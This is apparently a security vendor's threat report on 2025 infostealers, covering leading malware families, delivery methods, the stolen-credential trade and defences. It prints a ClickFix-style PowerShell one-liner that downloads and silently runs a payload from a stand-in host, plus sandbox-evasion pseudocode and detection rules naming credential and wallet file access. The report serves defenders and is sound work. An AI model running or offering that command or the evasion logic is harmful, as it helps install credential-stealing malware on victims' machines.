Q4 2025 Infostealer Threat Landscape: The Year Credential Theft Became an Industry

As we close out 2025, the numbers tell an unambiguous story: infostealers have become the dominant force in the cybercrime ecosystem. These aren't the crude keyloggers of a decade ago. Today's infostealers are sophisticated, modular, subscription-based malware platforms that extract everything from browser passwords to cryptocurrency seeds to facial recognition data.

This report synthesizes intelligence from the CovertLabs platform, law enforcement disclosures, security vendor research, and our own analysis of stealer log marketplaces. We cover the major developments of Q4 2025, contextualize them within the year's broader trends, and provide actionable guidance for defenders heading into 2026.

By the Numbers: 2025 in Review

According to KELA's Midyear Threat Report, the first half of 2025 saw 2.67 million machines compromised by infostealer malware, exposing over 204 million credentials. This represents a 24% increase over the same period in 2024.

The SpyCloud Identity Exposure Report found that credential theft now accounts for one in five data breaches, a 160% year-over-year increase. In a single month, 14,000 cases of exposed employee credentials were reported across monitored organizations.

Perhaps most concerning: businesses take an average of 94 days to remediate leaked credentials found in GitHub repositories and other public sources. That's three months of exposure, during which attackers can establish persistence, move laterally, and exfiltrate data.

The Big Three: Dominant Infostealers of 2025

1. LummaC2: The Undisputed Champion

LummaC2 (also known as Lumma Stealer) dominated the threat landscape with over 23.3 million detections in 2025. At its February peak, the malware achieved 204,045 detections in a single day. By mid-year, LummaC2 accounted for nearly 90% of all observed infostealer activity.

What makes LummaC2 so effective? A combination of technical sophistication and operational resilience:

// Target Data Categories
- Browser credentials (Chrome, Firefox, Edge, Opera, Brave)
- Cryptocurrency wallets (60+ wallet applications)
- Session tokens and cookies
- Two-factor authentication data
- Credit card autofill data
- System fingerprints and screenshots

// Evasion Techniques
- Process hollowing (impersonates legitimate processes)
- Obfuscated PowerShell execution
- Living-off-the-Land binaries (mshta.exe, wscript.exe)
- Trigonometric anti-sandbox detection
- Legitimate platform C2 (Steam, Google Forms, Telegram)

The latest LummaC2 variants (v4.0+) employ a novel anti-analysis technique: they use trigonometric calculations to analyze mouse movement patterns, delaying execution until human-like cursor activity is detected. This defeats automated sandbox analysis that relies on static mouse positions or programmatic movement.

function detectHumanMouse():
    positions = collectMousePositions(interval=50ms, count=50)
    
    for i in range(1, len(positions)):
        // Calculate angle between consecutive movements
        dx = positions[i].x - positions[i-1].x
        dy = positions[i].y - positions[i-1].y
        angle = atan2(dy, dx)
        
        // Human movement has irregular angles
        // Sandbox scripts produce linear/predictable patterns
        if varianceOf(angles) < THRESHOLD:
            return SANDBOX_DETECTED
    
    return HUMAN_DETECTED

In May 2025, a coordinated international operation involving Microsoft, the FBI, Europol, and security vendor ESET targeted LummaC2 infrastructure. The takedown disrupted operations temporarily, but post-crackdown analysis by Twilight Cyber revealed that command-and-control servers remained operational and infection rates rebounded within weeks.

By Q4 2025, LummaC2 infection rates had returned to an average of 4,000 new cases per day. The malware's resilience demonstrates a sobering reality: even well-coordinated law enforcement actions provide only temporary disruption against well-architected criminal infrastructure.

2. Formbook: The Silent Workhorse

While LummaC2 grabbed headlines, ESET's H2 2025 Threat Report documented Formbook overtaking the long-dominant Agent Tesla as the leading infostealer by certain metrics. Formbook's strength lies in its versatility: it functions as both an infostealer and a general-purpose remote access tool.

Formbook campaigns in Q4 2025 heavily targeted:

• Manufacturing sector: Invoice-themed phishing with malicious Excel attachments
• Logistics companies: Fake shipping notifications from DHL, FedEx, UPS
• Financial services: Spoofed wire transfer confirmations

3. Atomic Stealer: macOS Under Fire

The myth of macOS immunity finally died in 2025. Jamf's Security 360 Report documented a 28% spike in infostealer infections among Mac users, making infostealers the leading malware family on the platform.

Atomic Stealer (AMOS) led the macOS assault with 118,436 total detections in 2025. Unlike the constant high-volume activity of Windows stealers, Atomic Stealer showed highly volatile patterns: a single day in August recorded 10,689 detections, followed by periods of near-zero activity. This suggests targeted campaigns rather than mass distribution, likely aimed at high-value enterprise Mac users.

Q4 2025: New Threats Emerge

SantaStealer: The Holiday Season's Unwanted Gift

Just in time for the holidays, security researchers at TechRadar and others identified SantaStealer, a new malware strain derived from the earlier BluelineStealer. First observed in underground forums in late November 2025, SantaStealer has rapidly gained adoption due to its extensive feature set.

SantaStealer's 14 data collection modules target an exhaustive range of information:

• Browser credentials: Passwords, cookies, autofill, payment cards
• Cryptocurrency wallets: Desktop and browser extension wallets
• Messaging applications: Telegram, Discord, Signal sessions
• Local documents: Files matching sensitive extensions (.txt, .doc, .pdf, .key)
• Desktop screenshots: Captured at configurable intervals
• System information: Hardware IDs, installed software, network configuration

The malware stores stolen data in memory rather than writing to disk, compresses it, and exfiltrates to C2 servers in 10MB chunks. This approach minimizes forensic artifacts and helps evade endpoint detection rules that monitor for suspicious file operations.

Most notably, SantaStealer includes a working bypass for Chrome's App Bound Encryption, Google's 2024 security feature designed to prevent malware from accessing Chrome's cookie and credential stores. The bypass works by injecting into legitimate Chrome processes rather than attempting to decrypt the protected database directly.

Acreed: Rising from LummaC2's Shadow

When the May 2025 takedown temporarily disrupted LummaC2, the criminal ecosystem didn't pause. According to Dark Reading, the Acreed infostealer quickly filled the gap, gaining significant market share among MaaS customers looking for alternatives.

Acreed demonstrates how the infostealer economy has matured: when one vendor experiences disruption, customers simply migrate to competitors. The underlying business model, distribution channels, and customer base persist across individual malware families.

Distribution Evolution: How Infostealers Spread in 2025

Phishing: Still the King

Phishing remains the dominant delivery vector. IBM X-Force data shows an 84% increase in infostealers delivered via phishing emails in 2024 compared to 2023, with early 2025 data indicating a 180% surge over 2023 baselines.

Q4 2025 phishing campaigns heavily leveraged:

• AI-generated content: Grammatically perfect, contextually relevant lures
• Cloud-hosted payloads: Malicious files hosted on Azure Blob Storage, AWS S3, and Google Cloud to bypass reputation filters
• Thread hijacking: Infostealers used stolen email credentials to inject malicious replies into legitimate conversation threads

SEO Poisoning and Malvertising

Infostealers increasingly reach victims through search engine optimization (SEO) poisoning. Criminals create convincing clone websites for popular software—cracked applications, gaming cheats, productivity tools—and purchase search ads or manipulate organic rankings to appear at the top of results.

// Software cracks and keygens
"Adobe Photoshop 2025 crack download free"
"Microsoft Office 365 activation key generator"
"AutoCAD 2025 full version crack"

// Gaming and streaming
"FIFA 25 coin generator no survey"
"Valorant aimbot undetected 2025"
"Netflix premium account generator"

// Cryptocurrency tools
"Solana arbitrage bot free download"
"MEV bot ethereum 2025"
"Binance trading bot crack"

// AI tools (increasingly popular)
"ChatGPT Plus free access"
"Midjourney crack download"
"Sora video generator free"

The April 2025 Infostealer Trend Report documented distribution posts placed on legitimate platforms including forums, Q&A sites, Pinterest, and SlideShare. By using established domains, attackers bypass search engine safety filters that would flag newly registered sites.

ClickFix: Social Engineering Innovation

One of the more innovative distribution techniques of 2025 has been the "ClickFix" attack pattern, heavily associated with LummaC2 campaigns. The attack presents victims with fake error messages or CAPTCHA prompts that instruct them to:

1. Press Win+R to open the Run dialog
2. Paste clipboard contents (pre-loaded by the malicious page via JavaScript)
3. Press Enter to "fix" the supposed problem

The clipboard contains an obfuscated PowerShell command that downloads and executes the infostealer payload. This technique bypasses many security controls because the user manually initiates execution.

powershell -w hidden -ep bypass -c "
  $url = 'https://legitimate-looking-cdn[.]com/update.exe';
  $path = "$env:TEMP\svchost.exe";
  (New-Object Net.WebClient).DownloadFile($url, $path);
  Start-Process $path -WindowStyle Hidden
"

Law Enforcement Strikes Back: Operation Endgame

November 2025 brought a major law enforcement victory. Europol announced a coordinated operation that simultaneously targeted three major malware networks:

The operation targeted:

• Rhadamanthys: A sophisticated infostealer known for its modular architecture and cryptocurrency targeting
• VenomRAT: A remote access trojan frequently bundled with infostealers to provide persistent backdoor access
• Elysium botnet: An infrastructure network used to distribute multiple malware families

Operations spanned Germany, Greece, and the Netherlands, with coordination from Europol's European Cybercrime Centre (EC3). The seized infrastructure had infected hundreds of thousands of systems globally, collecting millions of credentials and accessing over 100,000 cryptocurrency wallets.

While significant, the operation's long-term impact remains to be seen. History suggests—as with the LummaC2 and Raccoon Stealer takedowns—that operators will rebuild infrastructure, migrate to new domains, and resume operations within weeks to months.

AI Integration: The Next Frontier

2025 marked the year infostealers began weaponizing artificial intelligence—not in their operation, but in their distribution and social engineering:

AI Tool Impersonation

ESET's research documented infostealers masquerading as popular generative AI tools:

• Midjourney: Fake "desktop apps" promising offline image generation
• Sora: Supposed early access to OpenAI's video generation tool
• Gemini: "Premium" versions claiming enhanced capabilities
• ChatGPT: Desktop clients and browser extensions with hidden payloads

These lures exploit the massive public interest in AI tools, particularly among users unfamiliar with the legitimate distribution channels.

GoldPickaxe: Stealing Your Face

Perhaps the most disturbing development of 2025 was GoldPickaxe, a mobile malware that steals facial recognition data to create deepfake videos. These synthetic videos are then used to bypass facial recognition authentication at financial institutions.

The attack chain:

1. Victim installs trojanized app (often disguised as government service or banking app)
2. Malware captures facial recognition data via camera access
3. Attackers generate deepfake video using stolen biometrics
4. Deepfake passes facial verification at target institution
5. Attackers gain account access or approve fraudulent transactions

This represents a fundamental shift: credentials can be changed, but biometrics cannot. Once stolen, facial recognition data provides attackers with permanent authentication material.

Geographic and Demographic Patterns

Credential exposure in 2025 followed predictable but important geographic patterns:

The most commonly targeted platforms globally:

• Discord: Session tokens enable full account takeover
• Microsoft/Azure: Corporate credentials for lateral movement
• Facebook/Meta: Ad account access for malvertising
• Gmail/Google: Password recovery for other services
• Roblox: Virtual currency theft targeting younger users

The Credential Economy: What Happens to Stolen Data

Stolen credentials don't sit idle. They flow through a sophisticated underground economy with multiple monetization paths:

Log Marketplaces

Dedicated marketplaces aggregate and sell stealer logs. Buyers can search by:

• Domain: Target specific companies or services
• Geography: Filter by victim country
• Log freshness: Recent logs command premium prices
• Account indicators: Verified email, payment methods linked, etc.

Russian Market and 2easy remain the dominant platforms, having absorbed market share from the Genesis Market takedown in 2023.

Initial Access Brokerage

Corporate VPN and remote access credentials are particularly valuable. Initial access brokers (IABs) purchase these credentials from stealer operators and resell them to ransomware gangs. A single set of VPN credentials for a mid-sized company can sell for $500–$5,000; credentials for Fortune 500 companies or critical infrastructure command $10,000+.

This is the direct pipeline from infostealer infection to ransomware attack. Many of 2025's high-profile ransomware incidents trace back to stealer log-sourced initial access.

Session Hijacking

Stolen cookies enable account takeover without passwords. Attackers import the victim's session cookies into their browser, inheriting the authenticated session. This bypasses both passwords and multi-factor authentication.

In Q4 2025, we observed particularly heavy targeting of:

• AWS/Azure/GCP consoles: Cloud infrastructure access
• Okta/Azure AD: Enterprise SSO sessions
• GitHub: Source code repository access
• Coinbase/Binance: Cryptocurrency exchange sessions

Defensive Recommendations for 2026

Based on 2025's threat evolution, we recommend the following defensive priorities:

Technical Controls

1. Deploy hardware security keys: FIDO2/WebAuthn authentication is the only reliable defense against session hijacking. Even with stolen cookies, attackers cannot complete authentication challenges.
2. Implement conditional access: Require device compliance, known networks, and risk-based authentication for sensitive resource access.
3. Monitor for stealer indicators: Detect browser database access from non-browser processes, cryptocurrency wallet directory enumeration, and suspicious PowerShell execution.
4. Reduce session lifetimes: Shorter session timeouts reduce the window during which stolen cookies remain valid.
5. Deploy EDR with behavioral detection: Signature-based detection cannot keep pace with infostealer evolution. Behavioral analysis catches novel variants.

Organizational Measures

1. Credential exposure monitoring: Continuously monitor stealer log marketplaces and data dumps for employee credentials. The CovertLabs platform provides this capability at scale.
2. Eliminate password reuse: Enforce password managers and unique credentials. When credentials from a personal account appear in stealer logs, they shouldn't provide corporate access.
3. User education on download hygiene: Train users to verify software sources. Pirated software remains the primary consumer infostealer vector.
4. Extend protection to macOS: The "Macs don't get viruses" era is over. Ensure endpoint protection covers all platforms.

# Suspicious browser credential access (Windows)
process.name != "chrome.exe" AND 
file.path CONTAINS "\Google\Chrome\User Data\Default\Login Data"

# Cryptocurrency wallet enumeration
file.path MATCHES "(%APPDATA%|%LOCALAPPDATA%).*\(Electrum|Exodus|Atomic|Coinomi)\.*"

# PowerShell download cradle
process.name == "powershell.exe" AND
command_line MATCHES "(DownloadFile|DownloadString|WebClient|Invoke-WebRequest)"

# mshta.exe network activity (LOLBin abuse)
process.name == "mshta.exe" AND 
network.connection.established == true

Looking Ahead: 2026 Predictions

Based on current trajectory, we anticipate the following developments in 2026:

1. Biometric data theft will accelerate: GoldPickaxe is a prototype. Expect more malware targeting facial recognition, voice prints, and behavioral biometrics.
2. Mobile infostealers will mature: As mobile devices increasingly serve as authentication factors, they become more attractive targets.
3. MaaS prices will continue falling: Competition among stealer operators benefits criminal buyers. Expect quality infostealers available for under $100/month.
4. AI-generated phishing at scale: LLMs will enable personalized, contextually relevant phishing at volumes previously impossible.
5. More law enforcement action—and more resilient criminal infrastructure: The cat-and-mouse continues. Both sides are improving.

Conclusion

The Q4 2025 infostealer landscape reflects a mature, industrialized criminal economy. The numbers are staggering: 204 million credentials exposed, 160% growth in credential theft, 23.3 million LummaC2 detections. Behind these statistics are real victims—individuals whose identities are stolen, companies whose networks are breached, and organizations whose operations are disrupted.

The good news: defenders are not helpless. Hardware security keys defeat session hijacking. Behavioral detection catches novel variants. Credential monitoring provides early warning. The tools exist; the challenge is deployment at scale.

At CovertLabs, we process and correlate stealer log data from across the criminal ecosystem. When credentials appear in underground marketplaces, our platform surfaces them before attackers can act. In the credential economy, visibility is defense.